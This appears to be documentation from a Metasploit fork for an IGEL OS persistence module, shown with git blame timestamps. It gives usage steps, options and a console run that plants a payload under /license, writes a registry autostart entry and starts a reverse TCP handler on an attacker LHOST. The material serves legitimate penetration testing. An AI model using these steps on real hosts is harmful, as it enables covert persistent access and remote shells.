Files
metasploit-gs/documentation/modules/exploit/linux/persistence/igel_persistence.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

35 lines
1.2 KiB
Markdown
Raw Normal View History

2025-11-17 16:33:15 +00:00
## Vulnerable Application
IGEL OS with a `shell` or `meterpreter` session.
## Verification Steps
1. Get a `shell` or `meterpreter` session on an IGEL OS host
2. Use: `use exploit/linux/persistence/igel_persistence`
2025-11-17 16:33:15 +00:00
3. Set: `set SESSION <id>`, replacing `<id>` with the session ID
4. Set payload options, e.g. `LHOST`
5. Exploit: `run`
6. The payload is executed on next boot/login (dependent on `REGISTRY_KEY`)
## Options
| Name | Description |
| ------------- | ------------------------------------------------------- |
| REGISTRY_KEY | Registry key to use for automatically executing payload |
| REGISTRY_ONLY | Set whether to store payload in registry |
| TARGET_DIR | Directory to write payload |
## Scenarios
```
msf exploit(linux/persistence/igel_persistence) > set SESSION 2
2025-11-17 16:33:15 +00:00
SESSION => 2
msf exploit(linux/persistence/igel_persistence) > set LHOST 192.168.56.1
2025-11-17 16:33:15 +00:00
LHOST => 192.168.56.1
msf exploit(linux/persistence/igel_persistence) > run
2025-11-17 16:33:15 +00:00
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Uploading payload to /license
[*] Writing persistence to registry
[*] Exploit completed, but no session was created.
```